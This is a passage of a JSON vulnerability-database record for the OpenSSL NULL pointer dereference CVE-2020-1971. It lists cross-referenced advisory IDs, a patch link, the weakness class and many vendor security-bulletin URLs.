        "id": "ESB-2021.0845",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.0864",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.0160",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2020.4394",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.1618",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.0233",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2020.4426.2",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.0986",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.0184",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2020.4385",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2020.4426.3",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2020.4514",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.0212",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.4083",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.2781",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.0670",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2020.4320",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2020.4365",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2022.0696",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.1207",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.1916",
        "trust": 0.6
      },
      {
        "db": "LENOVO",
        "id": "LEN-60182",
        "trust": 0.6
      },
      {
        "db": "CS-HELP",
        "id": "SB2022071618",
        "trust": 0.6
      },
      {
        "db": "CS-HELP",
        "id": "SB2021072165",
        "trust": 0.6
      },
      {
        "db": "CS-HELP",
        "id": "SB2022072010",
        "trust": 0.6
      },
      {
        "db": "CS-HELP",
        "id": "SB2021101259",
        "trust": 0.6
      },
      {
        "db": "CS-HELP",
        "id": "SB2021042543",
        "trust": 0.6
      },
      {
        "db": "CS-HELP",
        "id": "SB2021120313",
        "trust": 0.6
      },
      {
        "db": "CS-HELP",
        "id": "SB2022060315",
        "trust": 0.6
      },
      {
        "db": "CS-HELP",
        "id": "SB2021101929",
        "trust": 0.6
      },
      {
        "db": "CS-HELP",
        "id": "SB2022042259",
        "trust": 0.6
      },
      {
        "db": "CS-HELP",
        "id": "SB2022031104",
        "trust": 0.6
      },
      {
        "db": "CS-HELP",
        "id": "SB2021042618",
        "trust": 0.6
      },
      {
        "db": "CS-HELP",
        "id": "SB2021051226",
        "trust": 0.6
      },
      {
        "db": "ICS CERT",
        "id": "ICSA-21-336-06",
        "trust": 0.6
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202012-579",
        "trust": 0.6
      },
      {
        "db": "PACKETSTORM",
        "id": "160654",
        "trust": 0.2
      },
      {
        "db": "PACKETSTORM",
        "id": "161389",
        "trust": 0.2
      },
      {
        "db": "PACKETSTORM",
        "id": "161003",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "160644",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "161382",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "161388",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "161004",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "161387",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "160651",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "160638",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "160569",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "161390",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "160561",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "160639",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "161011",
        "trust": 0.1
      },
      {
        "db": "VULHUB",
        "id": "VHN-173115",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "161546",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "161548",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-173115"
      },
      {
        "db": "PACKETSTORM",
        "id": "160654"
      },
      {
        "db": "PACKETSTORM",
        "id": "160605"
      },
      {
        "db": "PACKETSTORM",
        "id": "161546"
      },
      {
        "db": "PACKETSTORM",
        "id": "161727"
      },
      {
        "db": "PACKETSTORM",
        "id": "160882"
      },
      {
        "db": "PACKETSTORM",
        "id": "161548"
      },
      {
        "db": "PACKETSTORM",
        "id": "162130"
      },
      {
        "db": "PACKETSTORM",
        "id": "161389"
      },
      {
        "db": "PACKETSTORM",
        "id": "160414"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202012-579"
      },
      {
        "db": "NVD",
        "id": "CVE-2020-1971"
      }
    ]
  },
  "id": "VAR-202012-1527",
  "iot": {
    "_id": null,
    "data": true,
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-173115"
      }
    ],
    "trust": 0.01
  },
  "last_update_date": "2026-04-10T22:40:10.893000Z",
  "patch": {
    "_id": null,
    "data": [
      {
        "title": "OpenSSL Fixes for code issue vulnerabilities",
        "trust": 0.6,
        "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=137225"
      }
    ],
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-202012-579"
      }
    ]
  },
  "problemtype_data": {
    "_id": null,
    "data": [
      {
        "problemtype": "CWE-476",
        "trust": 1.1
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-173115"
      },
      {
        "db": "NVD",
        "id": "CVE-2020-1971"
      }
    ]
  },
  "references": {
    "_id": null,
    "data": [
      {
        "trust": 2.3,
        "url": "https://www.oracle.com/security-alerts/cpuapr2021.html"
      },
      {
        "trust": 2.3,
        "url": "https://www.oracle.com/security-alerts/cpuapr2022.html"
      },
      {
        "trust": 2.3,
        "url": "https://www.oracle.com/security-alerts/cpujan2021.html"
      },
      {
        "trust": 2.3,
        "url": "https://www.oracle.com/security-alerts/cpuoct2021.html"
      },
      {
        "trust": 1.7,
        "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-389290.pdf"
      },
      {
        "trust": 1.7,
        "url": "https://kb.pulsesecure.net/articles/pulse_security_advisories/sa44676"
      },
      {
        "trust": 1.7,
        "url": "https://security.netapp.com/advisory/ntap-20201218-0005/"
      },
      {
        "trust": 1.7,
        "url": "https://security.netapp.com/advisory/ntap-20210513-0002/"
      },
      {
        "trust": 1.7,
        "url": "https://www.openssl.org/news/secadv/20201208.txt"
      },
      {
        "trust": 1.7,
        "url": "https://www.tenable.com/security/tns-2020-11"
      },
      {
        "trust": 1.7,
        "url": "https://www.tenable.com/security/tns-2021-09"
      },
      {
        "trust": 1.7,
        "url": "https://www.tenable.com/security/tns-2021-10"
      },
      {
        "trust": 1.7,
        "url": "https://www.debian.org/security/2020/dsa-4807"
      },
      {
        "trust": 1.7,
        "url": "https://security.freebsd.org/advisories/freebsd-sa-20:33.openssl.asc"
      },
      {
        "trust": 1.7,
        "url": "https://security.gentoo.org/glsa/202012-13"
      },
      {
        "trust": 1.7,
        "url": "https://www.oracle.com//security-alerts/cpujul2021.html"
      },
      {
        "trust": 1.7,
        "url": "https://lists.debian.org/debian-lts-announce/2020/12/msg00020.html"
      },
      {
        "trust": 1.7,
        "url": "https://lists.debian.org/debian-lts-announce/2020/12/msg00021.html"
      },
      {
        "trust": 1.7,
        "url": "http://www.openwall.com/lists/oss-security/2021/09/14/2"
      },
      {
        "trust": 1.4,
        "url": "https://access.redhat.com/security/cve/cve-2020-1971"
      },
      {
        "trust": 1.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-1971"
      },
      {
        "trust": 1.0,
        "url": "https://lists.apache.org/thread.html/rbb769f771711fb274e0a4acb1b5911c8aab544a6ac5e8c12d40c5143%40%3ccommits.pulsar.apache.org%3e"
      },
      {
        "trust": 1.0,
        "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/dgsi34y5lq5ryxn4m2i5zqt65lfvdouu/"
      },
      {
        "trust": 1.0,
        "url": "https://git.openssl.org/gitweb/?p=openssl.git%3ba=commitdiff%3bh=f960d81215ebf3f65e03d4d5d857fb9b666d6920"
      },
      {
        "trust": 1.0,
        "url": "https://lists.apache.org/thread.html/r63c6f2dd363d9b514d0a4bcf624580616a679898cc14c109a49b750c%40%3cdev.tomcat.apache.org%3e"
      },
      {
        "trust": 1.0,
        "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/pwpssznzobju2yr6z4tghxkyw3yp5qg7/"
      },
      {
        "trust": 1.0,
        "url": "https://git.openssl.org/gitweb/?p=openssl.git%3ba=commitdiff%3bh=2154ab83e14ede338d2ede9bbe5cdfce5d5a6c9e"
      },
      {
        "trust": 1.0,
        "url": "https://security.netapp.com/advisory/ntap-20240621-0006/"
      },
      {
        "trust": 0.8,
        "url": "https://bugzilla.redhat.com/):"
      },
      {
        "trust": 0.8,
        "url": "https://access.redhat.com/security/team/contact/"
      },
      {
        "trust": 0.7,
        "url": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2154ab83e14ede338d2ede9bbe5cdfce5d5a6c9e"
      },
      {
        "trust": 0.7,
        "url": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=f960d81215ebf3f65e03d4d5d857fb9b666d6920"
      },
      {
        "trust": 0.7,
        "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/pwpssznzobju2yr6z4tghxkyw3yp5qg7/"
      },
      {
        "trust": 0.7,
        "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/dgsi34y5lq5ryxn4m2i5zqt65lfvdouu/"
      },
      {
        "trust": 0.7,
        "url": "https://lists.apache.org/thread.html/rbb769f771711fb274e0a4acb1b5911c8aab544a6ac5e8c12d40c5143@%3ccommits.pulsar.apache.org%3e"
      },
      {
        "trust": 0.7,
        "url": "https://lists.apache.org/thread.html/r63c6f2dd363d9b514d0a4bcf624580616a679898cc14c109a49b750c@%3cdev.tomcat.apache.org%3e"
      },
      {
        "trust": 0.6,
        "url": "https://www.ibm.com/blogs/psirt/security-bulletin-a-denial-of-service-vulnerability-in-openssl-affects-ibm-infosphere-information-server/"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2020.4426.3/"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2020.4365/"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.1207"
      },
      {
        "trust": 0.6,
        "url": "https://www.ibm.com/blogs/psirt/security-bulletin-vulnerabilities-in-openssl-affect-ibm-spectrum-protect-backup-archive-client-netapp-services-cve-2020-1971-cve-2021-23840-cve-2021-23841/"
      },
      {
        "trust": 0.6,
        "url": "https://www.ibm.com/blogs/psirt/security-bulletin-security-vulnerabilities-affect-ibm-cloud-pak-for-data-openssl/"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.2781"
      },
      {
        "trust": 0.6,
        "url": "https://packetstormsecurity.com/files/160499/red-hat-security-advisory-2020-5422-01.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.ibm.com/blogs/psirt/security-bulletin-z-tpf-is-affected-by-an-openssl-vulnerability/"
      },
      {
        "trust": 0.6,
        "url": "https://packetstormsecurity.com/files/160605/red-hat-security-advisory-2020-5623-01.html"
      },
      {
        "trust": 0.6,
        "url": "https://packetstormsecurity.com/files/161727/red-hat-security-advisory-2021-0778-01.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.0212/"
      },
      {
        "trust": 0.6,
        "url": "https://www.ibm.com/blogs/psirt/security-bulletin-vulnerability-in-openssl-affects-ibm-cloud-pak-system-cve-2020-1971/"
      },
      {
        "trust": 0.6,
        "url": "http-request-smuggling-vulnerabilities/"
      },
      {
        "trust": 0.6,
        "url": "https://www.ibm.com/blogs/psirt/security-bulletin-ibm-app-connect-enterprise-certified-container-may-be-vulnerable-to-multiple-denial-of-service-and-"
      },
      {
        "trust": 0.6,
        "url": "https://www.oracle.com/security-alerts/cpujul2021.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.cybersecurity-help.cz/vdb/sb2022071618"
      },
      {
        "trust": 0.6,
        "url": "https://www.ibm.com/blogs/psirt/security-bulletin-ibm-cloud-pak-for-integration-is-vulnerable-to-openssl-vulnerability-cve-2020-1971/"
      },
      {
        "trust": 0.6,
        "url": "https://packetstormsecurity.com/files/161525/ubuntu-security-notice-usn-4745-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2020.4394/"
      },
      {
        "trust": 0.6,
        "url": "https://www.ibm.com/blogs/psirt/security-bulletin-ibm-security-privileged-identity-manager-is-affected-by-security-vulnerabilities-cve-2020-1971-cve-2020-15999-cve-2017-12652/"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.1618"
      },
      {
        "trust": 0.6,
        "url": "https://www.ibm.com/blogs/psirt/security-bulletin-app-connect-enterprise-certified-container-may-be-vulnerable-to-a-denial-of-service-vulnerability-cve-2020-1971/"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2020.4426.2/"
      },
      {
        "trust": 0.6,
        "url": "https://www.ibm.com/support/pages/node/6490837"
      },
      {
        "trust": 0.6,
        "url": "https://www.ibm.com/blogs/psirt/security-bulletin-ibm-security-guardium-is-affected-by-multiple-vulnerabilities-cve-2020-17530-cve-2020-1971-2/"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.0184/"
      },
      {
        "trust": 0.6,
        "url": "https://www.cybersecurity-help.cz/vdb/sb2021042543"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.0099/"
      },
      {
        "trust": 0.6,
        "url": "https://packetstormsecurity.com/files/160636/red-hat-security-advisory-2020-5637-01.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.0160/"
      },
      {
        "trust": 0.6,
        "url": "https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-in-openssl-affect-ibm-tivoli-netcool-system-service-monitors-application-service-monitors/"
      },
      {
        "trust": 0.6,
        "url": "https://www.cybersecurity-help.cz/vdb/sb2021051226"
      },
      {
        "trust": 0.6,
        "url": "https://www.cybersecurity-help.cz/vdb/sb2021101929"
      },
      {
        "trust": 0.6,
        "url": "https://www.ibm.com/support/pages/node/6486087"
      },
      {
        "trust": 0.6,
        "url": "https://www.cybersecurity-help.cz/vdb/sb2021072165"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.4104"
      },
      {
        "trust": 0.6,
        "url": "https://www.ibm.com/blogs/psirt/security-bulletin-ibm-cloud-pak-for-integration-is-vulnerable-to-node-js-vulnerabilities-cve-2020-1971-cve-2020-8265-and-cve-2020-8287/"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.1193"
      },
      {
        "trust": 0.6,
        "url": "https://www.cybersecurity-help.cz/vdb/sb2021101259"
      },
      {
        "trust": 0.6,
        "url": "https://packetstormsecurity.com/files/160882/red-hat-security-advisory-2021-0056-01.html"
      },
      {
        "trust": 0.6,
        "url": "https://packetstormsecurity.com/files/160916/red-hat-security-advisory-2021-0083-01.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-affect-ibm-sdk-for-node-js-in-ibm-cloud-5/"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.1916"
      },
      {
        "trust": 0.6,
        "url": "https://www.cybersecurity-help.cz/vdb/sb20220720109"
      },
      {
        "trust": 0.6,
        "url": "https://www.ibm.com/blogs/psirt/security-bulletin-openssl-publicly-disclosed-vulnerability-affects-ibm-mobilefirst-platform-cve-2020-1971/"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2020.4320/"
      },
      {
        "trust": 0.6,
        "url": "https://packetstormsecurity.com/files/160410/openssl-toolkit-1.1.1i.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.cybersecurity-help.cz/vdb/sb2022060315"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.0670"
      },
      {
        "trust": 0.6,
        "url": "https://device.harmonyos.com/cn/docs/security/update/security-bulletins-phones-202107-0000001170634565"
      },
      {
        "trust": 0.6,
        "url": "https://www.ibm.com/support/pages/node/6507579"
      },
      {
        "trust": 0.6,
        "url": "https://www.ibm.com/blogs/psirt/security-bulletin-vulnerabilities-in-openssl-affect-ibm-spectrum-protect-backup-archive-client-netapp-services-cve-2020-1971-cve-2021-23840-cve-2021-23841-2/"
      },
      {
        "trust": 0.6,
        "url": "https://us-cert.cisa.gov/ics/advisories/icsa-21-336-06"
      },
      {
        "trust": 0.6,
        "url": "https://www.cybersecurity-help.cz/vdb/sb2022031104"
      },
      {
        "trust": 0.6,
        "url": "https://www.ibm.com/blogs/psirt/security-bulletin-ibm-mq-appliance-is-affected-by-an-openssl-vulnerability-cve-2020-1971/"
      },
      {
        "trust": 0.6,
        "url": "https://packetstormsecurity.com/files/160523/red-hat-security-advisory-2020-5476-01.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2020.4385/"
      },
      {
        "trust": 0.6,
        "url": "https://packetstormsecurity.com/files/160414/ubuntu-security-notice-usn-4662-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.0111/"
      },
      {
        "trust": 0.6,
        "url": "https://www.ibm.com/blogs/psirt/security-bulletin-openssl-for-ibm-i-is-affected-by-cve-2020-1971/"
      },
      {
        "trust": 0.6,
        "url": "https://www.cybersecurity-help.cz/vdb/sb2021120313"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.4083"
      },
      {
        "trust": 0.6,
        "url": "https://www.ibm.com/support/pages/node/6520674"
      },
      {
        "trust": 0.6,
        "url": "https://source.android.com/security/bulletin/pixel/2021-06-01"
      },
      {
        "trust": 0.6,
        "url": "https://www.ibm.com/blogs/psirt/security-bulletin-ibm-watson-discovery-for-ibm-cloud-pak-for-data-affected-by-vulnerability-in-node-js-2/"
      },
      {
        "trust": 0.6,
        "url": "https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilites-in-node-js-affect-ibm-integration-bus-ibm-app-connect-enterprise-v11/"
      },
      {
        "trust": 0.6,
        "url": "https://www.ibm.com/blogs/psirt/security-bulletin-cloud-pak-for-security-has-several-security-vulnerabilities-addressed-in-the-latest-version/"
      },
      {
        "trust": 0.6,
        "url": "https://www.cybersecurity-help.cz/vdb/sb2021042618"
      },
      {
        "trust": 0.6,
        "url": "https://www.cybersecurity-help.cz/vdb/sb2022042259"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.0845"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.0691"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.0233/"
      },
      {
        "trust": 0.6,
        "url": "https://vigilance.fr/vulnerability/openssl-null-pointer-dereference-via-general-name-cmp-34055"
      },
      {
        "trust": 0.6,
        "url": "https://www.ibm.com/blogs/psirt/security-bulletin-openssl-publicly-disclosed-vulnerability-affects-messagegateway-cve-2020-1971/"
      },
      {
        "trust": 0.6,
        "url": "https://packetstormsecurity.com/files/162130/red-hat-security-advisory-2021-1129-01.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.ibm.com/blogs/psirt/security-bulletin-openssl-vulnerabilites-impacting-aspera-high-speed-transfer-server-aspera-high-speed-transfer-endpoint-aspera-desktop-client-4-0-and-earlier-cve-2020-1971/"
      },
      {
        "trust": 0.6,
        "url": "https://www.ibm.com/blogs/psirt/security-bulletin-a-vulnerability-was-identified-and-remediated-in-the-ibm-maas360-cloud-extender-v2-103-000-051-and-modules/"
      },
      {
        "trust": 0.6,
        "url": "https://packetstormsecurity.com/files/160961/red-hat-security-advisory-2021-0146-01.html"
      },
      {
        "trust": 0.6,
        "url": "https://support.lenovo.com/us/en/product_security/len-60182"
      },
      {
        "trust": 0.6,
        "url": "https://packetstormsecurity.com/files/161379/red-hat-security-advisory-2021-0486-01.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.0319/"
      },
      {
        "trust": 0.6,
        "url": "https://www.ibm.com/blogs/psirt/security-bulletin-ibm-security-guardium-is-affected-by-multiple-vulnerabilities-cve-2020-17530-cve-2020-1971-3/"
      },
      {
        "trust": 0.6,
        "url": "https://www.ibm.com/blogs/psirt/security-bulletin-vulnerability-in-openssl-affects-ibm-integrated-analytics-system-5/"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.0584"
      },
      {
        "trust": 0.6,
        "url": "https://msrc.microsoft.com/update-guide/vulnerability/cve-2020-1971"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.0184.2"
      },
      {
        "trust": 0.6,
        "url": "https://www.ibm.com/blogs/psirt/security-bulletin-vulnerability-in-openssl-affects-power-hardware-management-console-cve-2020-1971/"
      },
      {
        "trust": 0.6,
        "url": "https://www.ibm.com/blogs/psirt/security-bulletin-ibm-security-guardium-is-affected-by-multiple-vulnerabilities-cve-2020-17530-cve-2020-1971-4/"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2022.0696"
      },
      {
        "trust": 0.6,
        "url": "https://www.ibm.com/blogs/psirt/security-bulletin-vulnerabilities-in-openssl-affect-aix-cve-2020-1968-cve-2020-1971/"
      },
      {
        "trust": 0.6,
        "url": "https://www.ibm.com/blogs/psirt/security-bulletin-vulnerability-in-openssl-affects-ibm-rational-clearcase-cve-2020-1971-cve-2021-23839-cve-2021-23840-cve-2021-23841-cve-2021-23839-cve-2021-23840-cve-2021-23841/"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.0864"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.0986"
      },
      {
        "trust": 0.6,
        "url": "https://www.ibm.com/support/pages/node/6522990"
      },
      {
        "trust": 0.6,
        "url": "https://www.ibm.com/blogs/psirt/security-bulletin-cve-2020-1968-vulnerability-in-openssl-may-affect-ibm-workload-scheduler-3/"
      },
      {
        "trust": 0.6,
        "url": "https://www.ibm.com/blogs/psirt/security-bulletin-ibm-api-connect-is-impacted-by-a-denial-of-service-dos-vulnerability-in-openssl-cve-2020-1971/"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2020.4514/"
      },
      {
        "trust": 0.6,
        "url": "http-jackson-databind-openssl-and-node-js-affect-ibm-spectrum-control/"
      },
      {
        "trust": 0.6,
        "url": "https://www.ibm.com/blogs/psirt/security-bulletin-vulnerabilities-in-xstream-apache-"
      },
      {
        "trust": 0.6,
        "url": "https://packetstormsecurity.com/files/160704/gentoo-linux-security-advisory-202012-13.html"
      },
      {
        "trust": 0.6,
        "url": "https://packetstormsecurity.com/files/161916/red-hat-security-advisory-2021-0949-01.html"
      },
      {
        "trust": 0.6,
        "url": "https://packetstormsecurity.com/files/162142/red-hat-security-advisory-2021-1079-01.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.ibm.com/support/pages/node/6490373"
      },
      {
        "trust": 0.6,
        "url": "https://www.ibm.com/blogs/psirt/security-bulletin-ibm-security-qradar-analyst-workflow-add-on-to-ibm-qradar-siem-is-vulnerable-to-using-components-with-known-vulnerabilities/"
      },
      {
        "trust": 0.6,
        "url": "https://www.ibm.com/blogs/psirt/security-bulletin-ibm-security-guardium-is-affected-by-multiple-vulnerabilities-cve-2020-17530-cve-2020-1971/"
      },
      {
        "trust": 0.6,
        "url": "https://www.ibm.com/support/pages/node/6479353"
      },
      {
        "trust": 0.6,
        "url": "https://www.ibm.com/blogs/psirt/security-bulletin-app-connect-enterprise-certified-container-may-be-vulnerable-to-a-denial-of-service-vulnerability-cve-2020-1971-2/"
      },
      {
        "trust": 0.4,
        "url": "https://www.redhat.com/mailman/listinfo/rhsa-announce"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/cve/cve-2020-8177"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/updates/classification/#important"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/cve/cve-2019-20907"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/cve/cve-2019-20388"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/cve/cve-2020-7595"
      },
      {
        "trust": 0.4,
        "url": "https://listman.redhat.com/mailman/listinfo/rhsa-announce"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/cve/cve-2019-19956"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/cve/cve-2019-15903"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/cve/cve-2018-20843"
      },
      {
        "trust": 0.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-20843"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/updates/classification/#moderate"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/team/key/"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/articles/11258"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2020-25211"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-20388"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-19956"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-15903"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-20907"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-16166"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-15862"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2019-13050"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2019-20218"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2019-15165"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-14382"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2019-19221"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-1751"
      },
      {
        "trust": 0.2,
        "url": "https://docs.openshift.com/container-platform/4.7/release_notes/ocp-4-7-rel"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2019-16168"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-24659"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-9327"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2019-17450"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2019-16935"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2019-20916"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2019-5018"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/errata/rhsa-2020:5633"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-14422"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-1730"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2019-19906"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2019-20387"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-1752"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-8492"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2019-20454"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2019-13627"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-6405"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2019-14889"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-13632"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-10029"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-13630"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-14040"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-27813"
      },
      {
        "trust": 0.2,
